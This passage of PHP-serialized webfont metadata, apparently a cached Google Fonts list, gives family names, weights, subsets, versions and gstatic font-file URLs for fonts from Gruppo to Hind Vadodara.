wSNSEwM2zpA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:482;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Gruppo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/gruppo/v16/WwkfxPmzE06v_ZWFWXDAOIEQUQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:483;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Gudea\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/gudea/v15/neIFzCqgsI0mp-CP9IGON7Ez.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/gudea/v15/neILzCqgsI0mp9CN_oWsMqEzSJQ.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/gudea/v15/neIIzCqgsI0mp9gz26WGHK06UY30.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:484;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Gugi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/gugi/v13/A2BVn5dXywshVA6A9DEfgqM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:485;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Gulzar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/gulzar/v3/Wnz6HAc9eB3HB2ILYTwZqg_MPQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:486;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Gupter\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/gupter/v14/2-cm9JNmxJqPO1QUYZa_Wu_lpA.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/gupter/v14/2-cl9JNmxJqPO1Qslb-bUsT5rZhaZg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/gupter/v14/2-cl9JNmxJqPO1Qs3bmbUsT5rZhaZg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:487;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Gurajada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/gurajada/v15/FwZY7-Qx308m-l-0Kd6A4sijpFu_.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:488;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Gwendolyn\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/gwendolyn/v5/qkBXXvoO_M3CSss-d7ee5JRLkAXbMQ.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/gwendolyn/v5/qkBSXvoO_M3CSss-d7emWLtvmC7HONiSFQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:489;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Habibi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/habibi/v21/CSR-4zFWkuqcTTNCShJeZOYySQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:490;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Hachi Maru Pop\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/hachimarupop/v17/HI_TiYoRLqpLrEiMAuO9Ysfz7rW1EM_btd8u.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:491;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Hahmlet\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RhKOdjobsO-aVxn.ttf\";s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RjKONjobsO-aVxn.ttf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RgUONjobsO-aVxn.ttf\";s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RhKONjobsO-aVxn.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4Rh4ONjobsO-aVxn.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RiUP9jobsO-aVxn.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RitP9jobsO-aVxn.ttf\";s:3:\"800\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RjKP9jobsO-aVxn.ttf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/hahmlet/v9/BngXUXpCQ3nKpIo0TfPyfCdXfaeU4RjjP9jobsO-aVxn.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:492;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Halant\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2Pbsvc_pCmwZqcwdRXg.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/halant/v13/u-4-0qaujRI2PbsX39Jmky12eg.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2PbsvK_tCmwZqcwdRXg.ttf\";s:3:\"600\";s:72:\"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2PbsvB_xCmwZqcwdRXg.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/halant/v13/u-490qaujRI2PbsvY_1CmwZqcwdRXg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:493;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Hammersmith One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/hammersmithone/v17/qWcyB624q4L_C4jGQ9IK0O_dFlnbshsks4MRXw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:494;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Hanalei\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/hanalei/v23/E21n_dD8iufIjBRHXzgmVydREus.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:495;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Hanalei Fill\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/hanaleifill/v21/fC1mPYtObGbfyQznIaQzPQiMVwLBplm9aw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:496;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Handlee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/handlee/v14/-F6xfjBsISg9aMakDmr6oilJ3ik.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:497;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Hanuman\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"100\";s:73:\"http://fonts.gstatic.com/s/hanuman/v22/VuJzdNvD15HhpJJBQMLdPKNiaRpFvg.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/hanuman/v22/VuJ0dNvD15HhpJJBQAr_HIlMZRNcp0o.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/hanuman/v22/VuJxdNvD15HhpJJBeKbXOIFneRo.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/hanuman/v22/VuJ0dNvD15HhpJJBQBr4HIlMZRNcp0o.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/hanuman/v22/VuJ0dNvD15HhpJJBQCL6HIlMZRNcp0o.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:498;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Happy Monkey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/happymonkey/v14/K2F2fZZcl-9SXwl5F_C4R_OABwD2bWqVjw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:499;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Harmattan\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/harmattan/v15/goksH6L2DkFvVvRp9XpTS0CjkP1Yog.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/harmattan/v15/gokpH6L2DkFvVvRp9Xpr92-HmNZEq6TTFw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:500;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Headland One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/headlandone/v15/yYLu0hHR2vKnp89Tk1TCq3Tx0PlTeZ3mJA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:501;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Heebo\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EiS2cckOnz02SXQ.ttf\";s:3:\"200\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1ECSycckOnz02SXQ.ttf\";s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1E1yycckOnz02SXQ.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EiSycckOnz02SXQ.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EuyycckOnz02SXQ.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EVyucckOnz02SXQ.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EbiucckOnz02SXQ.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1ECSucckOnz02SXQ.ttf\";s:3:\"900\";s:83:\"http://fonts.gstatic.com/s/heebo/v21/NGSpv5_NC0k9P_v6ZUCbLRAHxK1EICucckOnz02SXQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:502;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Henny Penny\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/hennypenny/v17/wXKvE3UZookzsxz_kjGSfMQqt3M7tMDT.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:503;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Hepta Slab\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvkV5jfbY5B0NBkz.ttf\";s:3:\"200\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvmV5zfbY5B0NBkz.ttf\";s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvlL5zfbY5B0NBkz.ttf\";s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvkV5zfbY5B0NBkz.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvkn5zfbY5B0NBkz.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvnL4DfbY5B0NBkz.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvny4DfbY5B0NBkz.ttf\";s:3:\"800\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5HvmV4DfbY5B0NBkz.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/heptaslab/v17/ea8JadoyU_jkHdalebHvyWVNdYoIsHe5Hvm84DfbY5B0NBkz.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:504;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Herr Von Muellerhoff\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/herrvonmuellerhoff/v15/WBL6rFjRZkREW8WqmCWYLgCkQKXb4CAft3c6_qJY3QPQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:505;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Hi Melody\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/himelody/v13/46ktlbP8Vnz0pJcqCTbEf29E31BBGA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:506;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Hina Mincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/hinamincho/v8/2sDaZGBRhpXa2Jjz5w5LAGW8KbkVZTHR.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:507;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Hind\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfMJaIRuYjDpf5Vw.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/hind/v16/5aU69_a8oxmIRG5yBROzkDM.ttf\";s:3:\"500\";s:67:\"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfJpbIRuYjDpf5Vw.ttf\";s:3:\"600\";s:67:\"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfLZcIRuYjDpf5Vw.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/hind/v16/5aU19_a8oxmIfNJdIRuYjDpf5Vw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:508;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Hind Guntur\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_yGn1czn9zaj5Ju.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/hindguntur/v12/wXKvE3UZrok56nvamSuJd8Qqt3M7tMDT.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_zenlczn9zaj5Ju.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_zymVczn9zaj5Ju.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/hindguntur/v12/wXKyE3UZrok56nvamSuJd_yWmFczn9zaj5Ju.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:509;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Hind Madurai\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfXaUnecsoMJ0b_g.ttf\";s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xx0e2p98ZvDXdZQIOcpqjn8Y0DceA0OQ.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfBaQnecsoMJ0b_g.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfKaMnecsoMJ0b_g.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/hindmadurai/v11/f0Xu0e2p98ZvDXdZQIOcpqjfTaInecsoMJ0b_g.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:510;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Hind Siliguri\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoRDf44uEfKiGvxts.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwTs5juQtsyLLR5jN4cxBEofJvQxuk0Nig.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoRG_54uEfKiGvxts.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoREP-4uEfKiGvxts.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/hindsiliguri/v12/ijwOs5juQtsyLLR5jN4cxBEoRCf_4uEfKiGvxts.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:511;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Hind Vadodara\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSDn3iXM0oSOL2Yw.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/hindvadodara/v12/neINzCKvrIcn5pbuuuriV9tTcJXfrXsfvSo.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSGH2iXM0oSOL2Yw.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSE3xiXM0oSOL2Yw.ttf\";s:3:\"700\";s:87:\"